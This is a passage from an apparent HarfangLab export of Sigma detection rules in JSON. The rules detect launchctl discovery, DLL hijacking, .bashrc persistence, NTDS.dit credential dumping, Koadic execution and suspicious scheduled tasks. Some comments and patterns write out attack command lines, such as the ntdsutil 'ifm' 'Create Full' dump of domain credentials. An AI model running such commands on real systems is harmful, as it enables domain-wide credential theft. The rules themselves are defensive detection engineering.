"rule_description": "Detects the usage of launchctl to list the installed launch daemons/agents.\nAn attacker could list the installed launch daemons/agents to look for vulnerable daemons, or list defensive tools installed on the infected host.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-11-09",
"rule_modified_date": "2025-10-13",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1007",
"attack.t1569.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a431b083-8f5e-44d4-96c1-a3f0fe917ce6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096688Z",
"creation_date": "2026-03-23T11:45:34.096690Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096695Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_gup.yml",
"content": "title: DLL Hijacking via GUP.exe\nid: a431b083-8f5e-44d4-96c1-a3f0fe917ce6\ndescription: |\n Detects potential Windows DLL Hijacking via GUP.exe (Notepad++ updater).\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/12/22\nmodified: 2025/08/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'gup.exe'\n ProcessSignature: 'Notepad++'\n ImageLoaded|endswith: '\\libcurl.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Notepad++\\updater\\'\n - '?:\\Program Files\\Notepad++\\updater\\'\n - '*\\AppData\\Local\\Notepad++\\updater\\'\n - '*\\AppData\\Roaming\\Notepad++\\updater\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Notepad++\\updater\\'\n - '?:\\Program Files\\Notepad++\\updater\\'\n - '*\\AppData\\Local\\Notepad++\\updater\\'\n - '*\\AppData\\Roaming\\Notepad++\\updater\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n - 'Notepad++'\n\n exclusion_not_signed:\n sha256:\n - '9aa9fb6fa9414ab45bb0d4f1b1be2f401f0d0febcae434f99f8aa6febdd5a53e'\n - 'd9dea11f8e63fabdd33c3935fd0ab5440c066591f34e4c1b334a94f5cd47794b'\n - '5d6104def81177cad393733cd51738855ec492a8c809ca82140f262cb5376e19'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a431b083-8f5e-44d4-96c1-a3f0fe917ce6",
"rule_name": "DLL Hijacking via GUP.exe",
"rule_description": "Detects potential Windows DLL Hijacking via GUP.exe (Notepad++ updater).\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-12-22",
"rule_modified_date": "2025-08-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a478cd0a-d389-4c46-ab37-3ae588517a6a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075666Z",
"creation_date": "2026-03-23T11:45:34.075668Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075672Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/sandman-apt-a-mystery-group-targeting-telcos-with-a-luajit-toolkit/",
"https://attack.mitre.org/techniques/T1574/001/",
"https://attack.mitre.org/techniques/T1574/002/"
],
"name": "t1574_001_persistence_dll_hijack_spooler_ualapi.yml",
"content": "title: Print Spooler Service DLL Hijack Detected\nid: a478cd0a-d389-4c46-ab37-3ae588517a6a\ndescription: |\n Detects the execution of a DLL hijack of the Windows Print Spooler service trying to load the non-existent ualapi.dll DLL from system32 directory.\n Attackers may install a malicious DLL in the Windows folder for persistence purposes.\n It is recommended to verify the legitimacy of the loaded DLL and to look for other suspicious behavior.\nreferences:\n - https://www.sentinelone.com/labs/sandman-apt-a-mystery-group-targeting-telcos-with-a-luajit-toolkit/\n - https://attack.mitre.org/techniques/T1574/001/\n - https://attack.mitre.org/techniques/T1574/002/\ndate: 2023/09/22\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.defense_evasion\n - attack.t1574.001\n - attack.t1574.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\ualapi.dll'\n Image|endswith: '\\spoolsv.exe'\n\n exclusion_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a478cd0a-d389-4c46-ab37-3ae588517a6a",
"rule_name": "Print Spooler Service DLL Hijack Detected",
"rule_description": "Detects the execution of a DLL hijack of the Windows Print Spooler service trying to load the non-existent ualapi.dll DLL from system32 directory.\nAttackers may install a malicious DLL in the Windows folder for persistence purposes.\nIt is recommended to verify the legitimacy of the loaded DLL and to look for other suspicious behavior.\n",
"rule_creation_date": "2023-09-22",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1574.001",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a479f46f-ac6c-4a4e-ae31-8fcb6a1eb4ea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 1,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.635247Z",
"creation_date": "2026-03-23T11:45:34.596641Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596648Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md#atomic-test-2---add-command-to-bashrc",
"https://attack.mitre.org/techniques/T1546/004/"
],
"name": "t1546_004_bashrc_modified_linux.yml",
"content": "title: Suspicious Modification of .bashrc\nid: a479f46f-ac6c-4a4e-ae31-8fcb6a1eb4ea\ndescription: |\n Detects an attempt to modify the .bashrc file, a script file executed when a user logs in.\n Adversaries can use this file to perform various malicious tasks like establish persistence or disable the shell history file.\n It is recommended to investigate the new content of the .bashrc file as well as the execution context to determine the legitimacy of this action.\nreferences:\n - https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md#atomic-test-2---add-command-to-bashrc\n - https://attack.mitre.org/techniques/T1546/004/\ndate: 2023/01/03\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1546.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.ConfigChange\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_write:\n Kind: 'access'\n Permissions: 'write'\n Path:\n - '/root/.bashrc'\n - '/home/*/.bashrc'\n - '/etc/bash.bashrc'\n\n selection_misc:\n Kind:\n - 'rename'\n - 'symlink'\n - 'hardlink'\n TargetPath:\n - '/root/.bashrc'\n - '/home/*/.bashrc'\n - '/etc/bash.bashrc'\n\n exclusion_image:\n ProcessImage:\n - '/usr/sbin/userdel'\n - '/usr/sbin/mkhomedir_helper'\n - '/usr/libexec/oddjob/mkhomedir'\n - '/usr/bin/podman'\n - '/opt/yocto/*'\n - '/kaniko/executor'\n - '/bin/sed'\n - '/usr/bin/sed'\n - '/usr/sbin/luseradd'\n - '/usr/bin/tar'\n - '/usr/bin/install'\n - '/usr/bin/dpkg'\n - '/usr/bin/rsync'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n - '|/opt/bladelogic/*/NSH/sbin/bldeploy|'\n\n exclusion_useradd:\n - ProcessImage: '/usr/sbin/useradd'\n - ProcessCommandLine: '/usr/bin/perl /usr/sbin/adduser *'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/local/bin/dockerd'\n - '/usr/bin/dockerd-ce'\n - '/usr/sbin/dockerd-ce'\n - '/snap/docker/*/bin/dockerd'\n - ProcessAncestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_containerd:\n - ProcessImage:\n - '/usr/bin/containerd'\n - '/usr/sbin/containerd'\n - ProcessGrandparentImage:\n - '/usr/bin/containerd-shim-runc-v2'\n - '/snap/docker/*/bin/containerd-shim-runc-v2'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_k3s:\n ProcessImage: '/bin/containerd'\n ProcessParentCommandLine: '/bin/k3s server'\n\n exclusion_buildah:\n ProcessCommandLine|startswith: 'storage-untar / /'\n\n exclusion_yum:\n ProcessCommandLine: '/usr/bin/python /usr/bin/yum -y update'\n\n exclusion_puppet:\n - ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessGrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_ansible_current_directory:\n ProcessImage:\n - '/usr/bin/python?.?'\n - '/usr/libexec/platform-python?.?'\n ProcessCurrentDirectory: '/root/.ansible/tmp/'\n\n exclusion_rke2_containerd:\n ProcessImage: '/var/lib/rancher/rke2/data/*/bin/containerd'\n ProcessParentImage: '/usr/local/bin/rke2'\n\n # Not to be confused with Burp Suite\n # https://burp.grke.org/+\n exclusion_burp:\n ProcessImage: '/usr/sbin/burp'\n\n exclusion_code:\n ProcessCommandLine: '/usr/share/code/code --unity-launch'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a479f46f-ac6c-4a4e-ae31-8fcb6a1eb4ea",
"rule_name": "Suspicious Modification of .bashrc",
"rule_description": "Detects an attempt to modify the .bashrc file, a script file executed when a user logs in.\nAdversaries can use this file to perform various malicious tasks like establish persistence or disable the shell history file.\nIt is recommended to investigate the new content of the .bashrc file as well as the execution context to determine the legitimacy of this action.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1546.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a4a54343-dc8c-40e5-9a8c-18385699b85c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075359Z",
"creation_date": "2026-03-23T11:45:34.075361Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075365Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/rapid7/metasploit-framework/blob/2382d7530cf0cf2aa4ac63be30c98ca3fcdd6bbf/modules/post/windows/gather/credentials/domain_hashdump.rb",
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753343(v=ws.11)"
],
"name": "t1003_003_ntdsutil_domain_hashdump.yml",
"content": "title: Domain Hashdump Detected\nid: a4a54343-dc8c-40e5-9a8c-18385699b85c\ndescription: |\n Detects the dumping of the NTDS.dit file on a live Domain Controller to extract all user credentials.\n Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.\n It is recommended to determine if this dump is part of a regular backup mecanism, and if not the case, to immediately take remediative actions to cut the attackers' access to the domain controller.\nreferences:\n - https://github.com/rapid7/metasploit-framework/blob/2382d7530cf0cf2aa4ac63be30c98ca3fcdd6bbf/modules/post/windows/gather/credentials/domain_hashdump.rb\n - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753343(v=ws.11)\ndate: 2020/11/05\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.003\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Ntdsutil\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # ntdsutil \"ac in ntds\" \"ifm\" \"cr fu C:\\Perflogs\\1\"\n # ntdsutil \"activate instance ntds\" \"ifm\" \"Create Full C:\\Perflogs\\1\" \"quit quit\"\n selection_ntdsutil:\n Image|endswith: '\\ntdsutil.exe'\n\n selection_ifm:\n CommandLine:\n - '*ifm*'\n - ' *i* '\n\n selection_activate_instance_ntds:\n CommandLine|contains:\n - '*activate *instance *ntds*'\n - '*ac *i*'\n\n selection_create_full:\n CommandLine:\n - '*Create *Full*'\n - '*cr *fu*'\n\n exclusion_isars:\n CommandLine|re: 'ntdsutil\\.exe activate instance ntds ifm Create Full C:\\\\[a-zA-Z-0-9]{11} quit quit'\n User|contains: 'isars'\n\n exclusion_alticap:\n CommandLine: '?:\\Windows\\system32\\ntdsutil.exe activate instance ntds ifm create full ?:\\ProgramData\\Alticap\\ActiveDirectory\\NTDSbackup\\ADBackupFull#????-??-??T??-??-??.bak quit quit'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a4a54343-dc8c-40e5-9a8c-18385699b85c",
"rule_name": "Domain Hashdump Detected",
"rule_description": "Detects the dumping of the NTDS.dit file on a live Domain Controller to extract all user credentials.\nAdversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.\nIt is recommended to determine if this dump is part of a regular backup mecanism, and if not the case, to immediately take remediative actions to cut the attackers' access to the domain controller.\n",
"rule_creation_date": "2020-11-05",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.003",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a4aa19f3-3192-47f5-a0f6-5efc28a4fa98",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083858Z",
"creation_date": "2026-03-23T11:45:34.083860Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083865Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/offsecginger/koadic",
"https://attack.mitre.org/techniques/T1202/",
"https://attack.mitre.org/software/S0250/"
],
"name": "t1202_koadic_command_exec.yml",
"content": "title: Koadic Command Executed\nid: a4aa19f3-3192-47f5-a0f6-5efc28a4fa98\ndescription: |\n Detects patterns used by Koadic to execute remote commands on infected systems.\n Koadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub.\n Such commands are prefixed by a call to `chcp` to ensure the output is in English, which is also redirected to a temporary file that is then transferred back to the C2 server.\n It is recommended to investigate the command-line performing this action to determine its legitimacy and to look for other malicious actions. The network activity can be used to identify the machine at the origin of this action.\nreferences:\n - https://github.com/offsecginger/koadic\n - https://attack.mitre.org/techniques/T1202/\n - https://attack.mitre.org/software/S0250/\ndate: 2021/04/29\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1202\n - attack.s0250\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Trojan.Koadic\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # cmd.exe /q /c chcp 850 & cd 1> C:\\Users\\user\\AppData\\Local\\Temp\\925c7ae3-4336-43f0-9a7d-90d2cc35ed56.txt 2>&1\n selection_bin:\n - Image|endswith: '\\cmd.exe'\n - OriginalFileName: 'Cmd.Exe'\n\n selection_cmd:\n CommandLine|contains: '/q /c chcp * & * 1> ?:\\\\*\\Temp\\\\????????-????-????-????-????????????.txt 2>&1'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a4aa19f3-3192-47f5-a0f6-5efc28a4fa98",
"rule_name": "Koadic Command Executed",
"rule_description": "Detects patterns used by Koadic to execute remote commands on infected systems.\nKoadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub.\nSuch commands are prefixed by a call to `chcp` to ensure the output is in English, which is also redirected to a temporary file that is then transferred back to the C2 server.\nIt is recommended to investigate the command-line performing this action to determine its legitimacy and to look for other malicious actions. The network activity can be used to identify the machine at the origin of this action.\n",
"rule_creation_date": "2021-04-29",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a4efa888-5666-4c7a-be53-94ec7fa3b9c9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620746Z",
"creation_date": "2026-03-23T11:45:34.620749Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620754Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.cybertriage.com/blog/windows-scheduled-tasks-for-dfir-investigations/",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_unusual_task_with_many_actions.yml",
"content": "title: Scheduled Task With Unusual Number of Actions\nid: a4efa888-5666-4c7a-be53-94ec7fa3b9c9\ndescription: |\n Detects the creation or update of a scheduled task containing two actions or more.\n Threat actors may update an initially legitimate scheduled task by appending a second action (scheduled task's way of executing code) that launches their malicious payload for persistence as a way to avoid defenses.\n It is recommended to click the \"Task Information\" button and investigate the contents of the scheduled task thoroughly to determine maliciousness.\nreferences:\n - https://www.cybertriage.com/blog/windows-scheduled-tasks-for-dfir-investigations/\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2025/09/02\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ScheduledTask\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: scheduled_task\ndetection:\n selection:\n OperationType:\n - 'create'\n - 'update'\n NumberOfActions|gte: 2\n ProcessImage|contains: '?'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_microsoft_mare_backup:\n TaskName: '\\Microsoft\\Windows\\Application Experience\\MareBackup'\n FirstActionCommandLine: '%windir%\\system32\\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW invsvc'\n NumberOfActions: 3\n\n exclusion_microsoft_compat_appraise:\n TaskName: '\\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser'\n FirstActionCommandLine: '%windir%\\system32\\compattel\\DiagTrackRunner.exe /UploadEtlFilesOnly'\n NumberOfActions: 2\n\n exclusion_microsoft_tpm_clear:\n TaskName: '\\Microsoft\\Windows\\TPM\\ClearTPMIfNotReady'\n FirstActionCommandLine: 'tpminit.exe /cleartpmbypolicy'\n NumberOfActions: 2\n\n exclusion_microsoft_server_manager:\n TaskName: '\\Microsoft\\Windows\\Server Manager\\RemovewYukon'\n FirstActionCommandLine: 'msiexec /q /x {BDD79957-5801-4A2D-B09E-852E7FA64D01} CALLERID=ocsetup.exe'\n NumberOfActions: 2\n\n exclusion_microsoft_win11_perfmon:\n ProcessCommandLine: '?:\\WINDOWS\\System32\\perfmon.exe /noelev /report'\n TaskName: '\\Microsoft\\Windows\\PLA\\System\\{????????-????-????-????-????????????}_System Diagnostics'\n\n exclusion_update_touch_mode:\n TaskName|startswith: '\\eGalaxUpdateTouchMode'\n FirstActionCommandLine: '\"?:\\Program Files\\Common Files\\EETI\\TouchControl.exe\" -UpdateTouchMode'\n\n exclusion_avira:\n TaskName: '\\Avira_Security_Maintenance'\n FirstActionCommandLine: '?:\\Program Files (x86)\\Avira\\Security\\Avira.Spotlight.Service.Worker.exe FallbackTelemetry'\n\n exclusion_av:\n TaskName: '\\AVAST Software\\Gaming mode Task Scheduler recovery'\n ProcessImage:\n - '?:\\Program Files\\AVAST Software\\Suite\\\\*ToolsSvc.exe'\n - '?:\\Program Files\\AVAST Software\\Avast\\\\*ToolsSvc.exe'\n - '?:\\Program Files\\AVG\\Antivirus\\\\*ToolsSvc.exe'\n\n exclusion_amazon_managed_services:\n TaskName: '\\CleanUpAMS_Service'\n FirstActionCommandLine: 'powershell.exe -ExecutionPolicy 